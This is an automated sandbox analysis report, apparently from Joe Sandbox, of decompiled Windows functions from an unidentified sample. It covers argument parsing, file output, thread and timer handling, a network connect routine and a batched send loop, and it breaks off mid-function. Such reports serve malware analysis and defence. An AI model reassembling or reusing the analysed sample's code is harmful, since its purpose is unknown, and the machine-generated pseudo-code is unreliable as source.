Function 00A44C71 Relevance: 9.2, APIs: 6, Instructions: 185COMMON

Download Yara Rule

APIs

StrToIntA.SHLWAPI(?,?,00000000,?,?,?,00000000,00000000), ref: 00A44CE6
StrToIntA.SHLWAPI(?,?,00000000,?,?,?,00000000,00000000), ref: 00A44D37
StrToIntA.SHLWAPI(?,?,00000000,?,?,?,00000000,00000000), ref: 00A44DAA
StrToIntA.SHLWAPI(?,?,00000000,?,?,?,00000000,00000000), ref: 00A44E1D
StrToIntA.SHLWAPI(?,?,00000000,?,?,?,00000000,00000000), ref: 00A44E90
StrToIntA.SHLWAPI(?,?,00000000,?,?,?,00000000,00000000), ref: 00A44EE1

Part of subcall function 00A43360: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00A432B3,000000FF,00000000,00000000,00000000,00000000,00A432B3), ref: 00A43382
Part of subcall function 00A43360: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 00A433BC

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: ca5f1d22149986af25c8ecac7949f4810fb85a375f54d6ab718a7094dfbe5dfd
Instruction ID: c0131c443f29de537009d01dae498e2aad80c69748bfc3db20a7e0b4caae9391
Opcode Fuzzy Hash: ca5f1d22149986af25c8ecac7949f4810fb85a375f54d6ab718a7094dfbe5dfd
Instruction Fuzzy Hash: E191AF78D04218EFDF64CF98C994BEEBBB2BB88305F248199E509A7240C7356E85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A44FF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				PWCHAR* _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				char _v76;
				void* _t104;

				_v8 = 0;
				_v12 = 0;
				_v52 = 0;
				_v8 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_v8 == 0) {
					L20:
					ExitProcess(0);
				}
				if(_v12 == 0) {
					L16:
					_v44 =  *0xa4b05c;
					_v40 = _v44;
					__eflags = _v40;
					if(_v40 == 0) {
						_v48 = 0;
					} else {
						_v48 = E00A45190(_v40, 1);
					}
					LocalFree(_v8);
					goto L20;
				}
				_v20 = E00A43C00(_v8,  &(_v8[_v12]), L"-t");
				if(_v20 != 0) {
					E00A43040(E00A42C10( &_v76, _v20));
					E00A42FC0( &_v76);
				}
				if((E00A43B60(_v8,  &(_v8[_v12]), L"-o") & 0x000000ff) != 0) {
					_t91 =  &(_v8[_v12]);
					_v24 = E00A43C00(_v8,  &(_v8[_v12]), L"-o");
					_t110 = _v24;
					if(_v24 != 0) {
						E00A436C0(_t91);
						E00A43770(_v24);
					}
					E00A43830(_t110, E00A436C0(_t91), "%d\n", 0x16);
					_t104 = _t104 + 0xc;
				}
				_v36 = 0;
				_v28 = E00A42620(0x1ac);
				if(_v28 == 0) {
					_v32 = 0;
				} else {
					_v32 = E00A42800(_v28);
				}
				 *0xa4b05c = _v32;
				_v16 = 0;
				while(_v16 < 3) {
					_v36 =  *((intOrPtr*)(0xa4b000 + _v16 * 4));
					E00A44640(_v16, _v36); // executed
					_v16 = _v16 + 1;
				}
				E00A42BD0( *0xa4b05c, 0xffffffff); // executed
				goto L16;
			}

0x00a44ff6
0x00a44ffd
0x00a45004
0x00a4501c
0x00a45023
0x00a4517d
0x00a4517f
0x00a4517f
0x00a4502d
0x00a45149
0x00a4514e
0x00a45154
0x00a45157
0x00a4515b
0x00a4516c
0x00a4515d
0x00a45167
0x00a45167
0x00a45177
0x00000000
0x00a45177
0x00a4504b
0x00a45052
0x00a45062
0x00a4506a
0x00a4506a
0x00a4508c
0x00a45099
0x00a450a6
0x00a450a9
0x00a450ad
0x00a450af
0x00a450b8
0x00a450b8
0x00a450ca
0x00a450cf
0x00a450cf
0x00a450d2
0x00a450e6
0x00a450ed
0x00a450fc
0x00a450ef
0x00a450f7
0x00a450f7
0x00a45106
0x00a4510c
0x00a4511e
0x00a4512e
0x00a45135
0x00a4511b
0x00a4511b
0x00a45144
0x00000000

APIs

GetCommandLineW.KERNEL32(00000000), ref: 00A4500F
CommandLineToArgvW.SHELL32(00000000), ref: 00A45016
LocalFree.KERNEL32(00000000), ref: 00A45177

Part of subcall function 00A42C10: GetSystemTime.KERNEL32(?), ref: 00A42C7B
Part of subcall function 00A42C10: StrToIntA.SHLWAPI(00000000,00000000), ref: 00A42C8B
Part of subcall function 00A42C10: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A42CB7
Part of subcall function 00A42C10: FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000008,00000000,?,00000008), ref: 00A42D04
Part of subcall function 00A42C10: wnsprintfW.SHLWAPI ref: 00A42D24
Part of subcall function 00A42C10: VarDateFromStr.OLEAUT32(?,00000800,80000003,?), ref: 00A42D6A
Part of subcall function 00A42C10: VariantTimeToSystemTime.OLEAUT32 ref: 00A42D8F

Part of subcall function 00A42FC0: CloseHandle.KERNEL32(006F002D,?,?,00A4506F,00000000,00000000,00000000,00A49C80), ref: 00A42FE5
Part of subcall function 00A42FC0: CloseHandle.KERNEL32(006F002D,?,?,00A4506F,00000000,00000000,00000000,00A49C80), ref: 00A4301A

ExitProcess.KERNEL32 ref: 00A4517F

Strings

%d, xrefs: 00A450BF

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Time$System$CloseCommandFileHandleLine$ArgvDateExitFreeFromLocalProcessVariantwnsprintf
String ID: %d
API String ID: 2725239889-545462948
Opcode ID: 0914dfa96cba6a62d94d9bcf36e25c99b5c9498c4c362639037966b0ecfd0113
Instruction ID: ce591ef8437d43dc73802e8d9c61cbd0f2adb495cce6b3ad3bd4e79e0ed08cba
Opcode Fuzzy Hash: 0914dfa96cba6a62d94d9bcf36e25c99b5c9498c4c362639037966b0ecfd0113
Instruction Fuzzy Hash: 5841F3B8D00209EFCB04EFE8D989BEEB7B5AFC8305F208558E00167292D7755A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A43870 Relevance: 7.6, APIs: 5, Instructions: 80
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A43870(void* __eflags, char* _a8, void* _a12) {
				void* _v8;
				void* _v12;
				int _v16;
				int _v20;
				long _v24;
				char _v28;
				struct _OVERLAPPED* _v32;
				void* _t29;
				int _t38;

				_v20 = 0;
				E00A43600( &_v28, 0xa4b040);
				_t29 = E00A42420( &_v28, 0x1001); // executed
				_v8 = _t29;
				if(_v8 != 0) {
					_t48 = _a8;
					_v16 = wvnsprintfA(_v8, 0x1000, _a8, _a12);
					if(_v16 > 0) {
						_v24 = 0;
						if( *0xa4b058 == 0) {
							_t48 = _v8;
							_t38 = WriteFile(GetStdHandle(0xfffffff5), _v8, _v16,  &_v24, 0); // executed
							_v20 = _t38;
						} else {
							_v12 = CreateFileW( *0xa4b058, 4, 7, 0, 4, 0x80, 0);
							if((E00A43660(_v12, _v12) & 0x000000ff) != 0) {
								_v20 = WriteFile(_v12, _v8, _v16,  &_v24, 0);
							}
							_t48 = _v12;
							E00A43690(_v12, _v12);
						}
					}
					E00A424F0(_t48, _v8);
				}
				_v32 = _v20;
				E00A43630( &_v28);
				return _v32;
			}

0x00a43876
0x00a43885
0x00a4388f
0x00a43894
0x00a4389b
0x00a438a5
0x00a438b8
0x00a438bf
0x00a438c5
0x00a438d3
0x00a43933
0x00a43940
0x00a43946
0x00a438d5
0x00a438f0
0x00a43901
0x00a4391b
0x00a4391b
0x00a4391e
0x00a43922
0x00a43922
0x00a438d3
0x00a4394d
0x00a4394d
0x00a43955
0x00a4395b
0x00a43966

APIs

Part of subcall function 00A43600: EnterCriticalSection.KERNEL32(00A4B040,00000000,?,00A43A1A,00A4B040,00006810,00000000,00000000), ref: 00A43615

Part of subcall function 00A42420: GetProcessHeap.KERNEL32(00000008,00000000,?,?,00A4262C,00000000,?,00A450E3,000001AC,00000000,?,00A49C88,00000000,00000000,00A49C80), ref: 00A4242A
Part of subcall function 00A42420: RtlAllocateHeap.NTDLL(00000000,?,?,00A4262C,00000000,?,00A450E3,000001AC,00000000,?,00A49C88,00000000,00000000,00A49C80), ref: 00A42431

wvnsprintfA.SHLWAPI(00000000,00001000,00000000,00000000), ref: 00A438B2
CreateFileW.KERNEL32(?,00000004,00000007,00000000,00000004,00000080,00000000), ref: 00A438EA
WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000,?), ref: 00A43915
GetStdHandle.KERNEL32(000000F5,00000000,00000000,00000000,00000000), ref: 00A43939
WriteFile.KERNELBASE(00000000), ref: 00A43940

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: File$HeapWrite$AllocateCreateCriticalEnterHandleProcessSectionwvnsprintf
String ID:
API String ID: 2519008796-0
Opcode ID: 96a0226e3ae5d05f1adf48e64638679b127fea8e60aff9ef45765f1580a808d8
Instruction ID: a56ab64af22fe485db2e90b2b59c368f73ad1fb7729045187a9e2a2864dc38dc
Opcode Fuzzy Hash: 96a0226e3ae5d05f1adf48e64638679b127fea8e60aff9ef45765f1580a808d8
Instruction Fuzzy Hash: 4A310ABE900209FBDF04DFE4CD45FAFB7B8AB88701F104558B615A7281D7B4AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A454E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(00000001,00003A98,00000010), ref: 00A454F5
WSAGetLastError.WS2_32 ref: 00A45515
__WSAFDIsSet.WS2_32(000000FF,00000000), ref: 00A455BA

Strings

@, xrefs: 00A4556B

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: ErrorLastconnect
String ID: @
API String ID: 374722065-2766056989
Opcode ID: d4edc51a92e8b8020169d1d7d2ba9433cc4f6985e301a29280790c3064d81d29
Instruction ID: 63a2036c6fbb08c4deecf97b835447dd920a5bcb1e6edb5e36a44c200d69e60f
Opcode Fuzzy Hash: d4edc51a92e8b8020169d1d7d2ba9433cc4f6985e301a29280790c3064d81d29
Instruction Fuzzy Hash: 3231FD79D0050CEBCB14CFA4D885BFE7776BB88310F608685E52A97281D7B49E84DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00A428E0 Relevance: 6.0, APIs: 4, Instructions: 48
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A428E0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				union _LARGE_INTEGER _v20;
				int _t20;
				intOrPtr _t25;

				_t25 = __edx;
				_v12 = __ecx;
				_v8 = 0;
				_v8 = CreateWaitableTimerW(0, 1, 0);
				_t27 = _v8;
				if(_v8 != 0) {
					_v20.LowPart = E00A48040(E00A47F90(E00A427B0(_t25, _t27, _a4, 0), _t25, 0x64, 0), _t25, 0xffffffff, 0xffffffff);
					_v16 = _t25;
					_t20 = SetWaitableTimer(_v8,  &_v20, 0, 0, 0, 0); // executed
					if(_t20 == 0) {
						CloseHandle(_v8);
						_v8 = 0;
					}
				}
				return _v8;
			}

0x00a428e0
0x00a428e6
0x00a428e9
0x00a428fc
0x00a428ff
0x00a42903
0x00a42927
0x00a4292a
0x00a4293d
0x00a42945
0x00a4294b
0x00a42951
0x00a42951
0x00a42945
0x00a4295e

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00A428F6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A42917
SetWaitableTimer.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,?,000000FF,000000FF,00000000,?,00000064,00000000,?,00000000), ref: 00A4293D
CloseHandle.KERNEL32(00000000,?,000000FF,000000FF,00000000,?,00000064,00000000,?,00000000), ref: 00A4294B

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: TimerWaitable$CloseCreateHandleUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 98796423-0
Opcode ID: 1530f62c594f4b12aa8e22ba502664e6fd270c6f9aa638f00b35af7a800a3dc0
Instruction ID: 636bf394d2dd0bc5c65444356f68b4cec955c903fb46c8f16f4453965fcd93e0
Opcode Fuzzy Hash: 1530f62c594f4b12aa8e22ba502664e6fd270c6f9aa638f00b35af7a800a3dc0
Instruction Fuzzy Hash: 7C0112B8A44308BBEB10DFE4CD0AF6E76B8AB84710F604658B614BB2C0D7B56A409B54

Uniqueness

Uniqueness Score: -1.00%

Function 00A42AC0 Relevance: 4.6, APIs: 3, Instructions: 83
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A42AC0(intOrPtr __ecx, _Unknown_base(*)()* _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				char _v20;
				void* _t56;
				void* _t61;

				_v8 = __ecx;
				E00A426E0( &_v20, _v8);
				if( *(_v8 + 0x1a8) >= 0x32) {
					if(E00A429C0(_v8, 0xffffffff) != 0) {
						E00A42AC0(_v8, _a4, _a8, _a12);
					}
					L8:
					return E00A42710( &_v20);
				}
				_t56 = E00A428E0(_v8, _a12, _a12); // executed
				_v12 = _t56;
				 *(_v8 + 0x1c +  *(_v8 + 0x1a8) * 8) = _v12;
				if((E00A427D0(_v12, _v12) & 0x000000ff) != 0) {
					_t61 = CreateThread(0, 0, _a4, _a8, 0, 0); // executed
					_v16 = _t61;
					 *((intOrPtr*)(_v8 + 0x18 +  *(_v8 + 0x1a8) * 8)) = _v16;
					if((E00A427D0(_v8, _v16) & 0x000000ff) == 0) {
						CloseHandle( *(_v8 + 0x1c +  *(_v8 + 0x1a8) * 8));
						 *(_v8 + 0x1c +  *(_v8 + 0x1a8) * 8) = 0;
					} else {
						 *(_v8 + 0x1a8) =  *(_v8 + 0x1a8) + 1;
					}
				}
				goto L8;
			}

0x00a42ac6
0x00a42ad0
0x00a42adf
0x00a42ba3
0x00a42bb4
0x00a42bb4
0x00a42bb9
0x00a42bc4
0x00a42bc4
0x00a42aec
0x00a42af1
0x00a42b03
0x00a42b15
0x00a42b27
0x00a42b2d
0x00a42b3f
0x00a42b51
0x00a42b7b
0x00a42b8d
0x00a42b53
0x00a42b62
0x00a42b62
0x00a42b51
0x00000000

APIs

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00A42AD0

Part of subcall function 00A428E0: CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00A428F6
Part of subcall function 00A428E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A42917
Part of subcall function 00A428E0: SetWaitableTimer.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,?,000000FF,000000FF,00000000,?,00000064,00000000,?,00000000), ref: 00A4293D
Part of subcall function 00A428E0: CloseHandle.KERNEL32(00000000,?,000000FF,000000FF,00000000,?,00000064,00000000,?,00000000), ref: 00A4294B

CreateThread.KERNELBASE ref: 00A42B27
CloseHandle.KERNEL32(00000000,?), ref: 00A42B7B

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleTimerWaitable$Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::_ThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3628201841-0
Opcode ID: d9d22f95b3601e1b99e344368729124a1e129f3c4ae921f09e2bdbb7a99bc1b8
Instruction ID: 54da422074c1bdabf986f427d44ad4e2f88b2dce7bed97f7354d9c044e12eaac
Opcode Fuzzy Hash: d9d22f95b3601e1b99e344368729124a1e129f3c4ae921f09e2bdbb7a99bc1b8
Instruction Fuzzy Hash: 8231A878A00108EFDB14DF95C991FAEB7B5FF88300F648198B9059B381DA31AE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A429C0 Relevance: 4.6, APIs: 3, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A429C0(intOrPtr __ecx, long _a4) {
				intOrPtr _v8;
				signed int _v12;
				long _v16;
				int _v20;
				int _v24;
				int _v28;
				signed int _t80;
				signed int _t82;
				intOrPtr _t94;
				signed int _t95;
				intOrPtr _t96;
				intOrPtr _t110;

				_v8 = __ecx;
				_v20 = 0;
				_v16 = WaitForMultipleObjects( *(_v8 + 0x1a8) << 1, _v8 + 0x18, 0, _a4);
				if(_v16 >= 0 && _v16 <=  *(_v8 + 0x1a8) +  *(_v8 + 0x1a8) - 1) {
					_v12 = _v16 >> 1;
					E00A42970(_v8,  *(_v8 + 0x18 + _v12 * 8)); // executed
					CloseHandle( *(_v8 + 0x18 + _v12 * 8));
					CloseHandle( *(_v8 + 0x1c + _v12 * 8));
					_t80 =  *(_v8 + 0x1a8);
					_t94 = _v8;
					_t95 = _v12;
					_t110 = _v8;
					 *((intOrPtr*)(_t110 + 0x18 + _t95 * 8)) =  *((intOrPtr*)(_t94 + 0x10 + _t80 * 8));
					 *((intOrPtr*)(_t110 + 0x1c + _t95 * 8)) =  *((intOrPtr*)(_t94 + 0x14 + _t80 * 8));
					_v28 = 0;
					_v24 = 0;
					_t82 =  *(_v8 + 0x1a8);
					_t96 = _v8;
					 *(_t96 + 0x10 + _t82 * 8) = _v28;
					 *(_t96 + 0x14 + _t82 * 8) = _v24;
					 *(_v8 + 0x1a8) =  *(_v8 + 0x1a8) - 1;
					_v20 = 1;
				}
				return _v20;
			}

0x00a429c7
0x00a429ca
0x00a429f0
0x00a429f7
0x00a42a18
0x00a42a29
0x00a42a39
0x00a42a4a
0x00a42a53
0x00a42a59
0x00a42a64
0x00a42a67
0x00a42a6a
0x00a42a6e
0x00a42a72
0x00a42a79
0x00a42a83
0x00a42a89
0x00a42a8f
0x00a42a96
0x00a42aa9
0x00a42aaf
0x00a42aaf
0x00a42abd

APIs

WaitForMultipleObjects.KERNEL32(?,000000E7,00000000,?), ref: 00A429EA

Part of subcall function 00A42970: GetExitCodeThread.KERNELBASE(?,00000000,?,?), ref: 00A42998
Part of subcall function 00A42970: TerminateThread.KERNEL32(00000001,00000001), ref: 00A429B1

CloseHandle.KERNEL32(?,?), ref: 00A42A39
CloseHandle.KERNEL32(?), ref: 00A42A4A

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CloseHandleThread$CodeExitMultipleObjectsTerminateWait
String ID:
API String ID: 3878637038-0
Opcode ID: 2c6bab6091bd2b9f3b9dea75e0d583541dbf9b2aae93d14f10352ec5ee9b9b4a
Instruction ID: e74eab408dd15b8dc988541da730c0122c821089e1d9b0ad83d5266415c8d7bf
Opcode Fuzzy Hash: 2c6bab6091bd2b9f3b9dea75e0d583541dbf9b2aae93d14f10352ec5ee9b9b4a
Instruction Fuzzy Hash: 9531B978A01209EFCB14DF88C594AAEB7F5FF88340F2042A8E90567341C731AE51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B8D Relevance: 3.1, APIs: 2, Instructions: 72
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00A46B8D() {
				signed int _t351;
				signed int _t352;
				signed int _t355;
				signed int _t370;
				signed int _t379;
				void* _t383;
				signed int _t392;
				signed int _t426;
				intOrPtr _t430;
				signed int _t433;
				signed int _t444;
				intOrPtr _t460;
				signed int _t487;
				signed int _t499;
				intOrPtr _t510;
				signed int _t523;
				signed int _t525;
				intOrPtr _t547;
				signed int _t581;
				void* _t588;
				signed int _t589;
				signed int _t590;
				long _t591;
				signed int _t592;
				signed int _t610;
				signed int _t611;
				intOrPtr _t619;
				signed int _t644;
				signed int _t654;
				signed int _t656;
				void* _t661;
				void* _t663;
				void* _t665;
				void* _t666;

				goto L6;
				do {
					L7:
					if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
						_t487 =  *(_t661 + 8);
						__eflags =  *((intOrPtr*)(_t487 + 0x10038)) - 0xffffffff;
						if( *((intOrPtr*)(_t487 + 0x10038)) != 0xffffffff) {
							E00A46480( *(_t661 - 4),  *(_t661 + 8));
							E00A42540(_t661 - 0xc8, 0x80);
							 *(_t661 - 0x18) = 0;
							__eflags =  *(_t661 - 0x20) - 0xffffffff;
							if( *(_t661 - 0x20) <= 0xffffffff) {
								 *(_t661 - 0x2c) = 0;
							} else {
								 *(_t661 - 0x2c) =  *(_t661 - 0x20) + 1;
							}
							 *(_t661 - 0x14) =  *(_t661 - 0x2c);
							while(1) {
								_t351 =  *(_t661 + 8);
								__eflags =  *(_t661 - 0x14) -  *((intOrPtr*)(_t351 + 0x10d58));
								if( *(_t661 - 0x14) >  *((intOrPtr*)(_t351 + 0x10d58))) {
									break;
								}
								 *(_t661 - 0x20) =  *(_t661 - 0x14);
								_t383 =  *(_t661 + 8) +  *(_t661 - 0x14);
								_t503 =  *((char*)(_t383 + 0x10956));
								__eflags =  *((char*)(_t383 + 0x10956));
								if( *((char*)(_t383 + 0x10956)) != 0) {
									_t588 =  *(_t661 + 8) +  *(_t661 - 0x14);
									__eflags =  *((char*)(_t588 + 0x10556));
									if( *((char*)(_t588 + 0x10556)) != 0) {
										 *(_t661 - 0x1c) = 0;
										while(1) {
											_t589 =  *(_t661 + 8);
											__eflags =  *(_t661 - 0x1c) -  *((intOrPtr*)(_t589 + 0x1014c));
											if( *(_t661 - 0x1c) >=  *((intOrPtr*)(_t589 + 0x1014c))) {
												break;
											}
											_t510 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4));
											__eflags =  *((intOrPtr*)(_t510 + 0xc)) -  *(_t661 - 0x14);
											if( *((intOrPtr*)(_t510 + 0xc)) ==  *(_t661 - 0x14)) {
												E00A42540(_t661 - 0x1c8, 0x100);
												 *(_t661 - 8) = E00A46860( *(_t661 - 4), _t661 - 0x1c8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x1c) * 4)) + 9) & 0x000000ff);
												__eflags =  *(_t661 - 8);
												if( *(_t661 - 8) > 0) {
													__eflags =  *(_t661 - 0x18) +  *(_t661 - 8) - 0x80;
													if( *(_t661 - 0x18) +  *(_t661 - 8) >= 0x80) {
														E00A457D0(_t661 - 0xc8,  *(_t661 - 4), _t661 - 0xc8,  *(_t661 - 0x18),  *(_t661 + 8));
														 *(_t661 - 0x18) = 0;
														E00A42540(_t661 - 0xc8, 0x80);
													}
													E00A42190(_t661 +  *(_t661 - 0x18) - 0xc8, _t661 - 0x1c8,  *(_t661 - 8));
													_t663 = _t663 + 0xc;
													 *(_t661 - 0x18) =  *(_t661 - 0x18) +  *(_t661 - 8);
													_t523 =  *( *(_t661 + 8) + 8) + 1;
													__eflags = _t523;
													 *( *(_t661 + 8) + 8) = _t523;
												}
												Sleep(0x3e8);
											}
											_t503 =  *(_t661 - 0x1c) + 1;
											__eflags = _t503;
											 *(_t661 - 0x1c) = _t503;
										}
										__eflags =  *(_t661 - 0x18);
										if( *(_t661 - 0x18) > 0) {
											E00A457D0( *(_t661 - 0x18),  *(_t661 - 4), _t661 - 0xc8,  *(_t661 - 0x18),  *(_t661 + 8));
											 *(_t661 - 0x18) = 0;
											_t503 = _t661 - 0xc8;
											E00A42540(_t661 - 0xc8, 0x80);
										}
										L74:
										__eflags =  *(_t661 + 8);
										if( *(_t661 + 8) == 0) {
											L78:
											__eflags =  *(_t661 + 8);
											if( *(_t661 + 8) != 0) {
												_t590 =  *(_t661 + 8);
												__eflags =  *(_t590 + 0x10d60);
												if( *(_t590 + 0x10d60) > 0) {
													E00A439C0(E00A436C0(_t503));
													_push(0x68b3);
													E00A43830(__eflags, E00A436C0(_t386), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
													_t663 = _t663 + 0x10;
													_t591 =  *( *(_t661 + 8) + 0x10d60) * 0x3e8;
													__eflags = _t591;
													Sleep(_t591);
												}
											}
											L81:
											break;
										}
										_t592 =  *(_t661 + 8);
										__eflags =  *((intOrPtr*)(_t592 + 0x10d68)) - 0xffffffff;
										if( *((intOrPtr*)(_t592 + 0x10d68)) == 0xffffffff) {
											goto L78;
										}
										_t392 =  *(_t661 + 8);
										_t503 =  *(_t661 - 0x20);
										__eflags =  *(_t661 - 0x20) -  *((intOrPtr*)(_t392 + 0x10d68));
										if( *(_t661 - 0x20) !=  *((intOrPtr*)(_t392 + 0x10d68))) {
											goto L78;
										}
										E00A439C0(E00A436C0(_t503));
										_push(0x68b2);
										E00A43830(__eflags, E00A436C0(_t393), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
										_t663 = _t663 + 0x10;
										Sleep( *( *(_t661 + 8) + 0x10d64) * 0x3e8);
										goto L81;
									}
									 *(_t661 - 0xc) = 0;
									while(1) {
										_t610 =  *(_t661 + 8);
										__eflags =  *(_t661 - 0xc) -  *((intOrPtr*)(_t610 + 0x1014c));
										if( *(_t661 - 0xc) >=  *((intOrPtr*)(_t610 + 0x1014c))) {
											break;
										}
										_t547 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4));
										__eflags =  *((intOrPtr*)(_t547 + 0xc)) -  *(_t661 - 0x14);
										if( *((intOrPtr*)(_t547 + 0xc)) ==  *(_t661 - 0x14)) {
											_t460 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0xc) * 4));
											__eflags =  *(_t460 + 8) & 0x000000ff;
											if(( *(_t460 + 8) & 0x000000ff) != 0) {
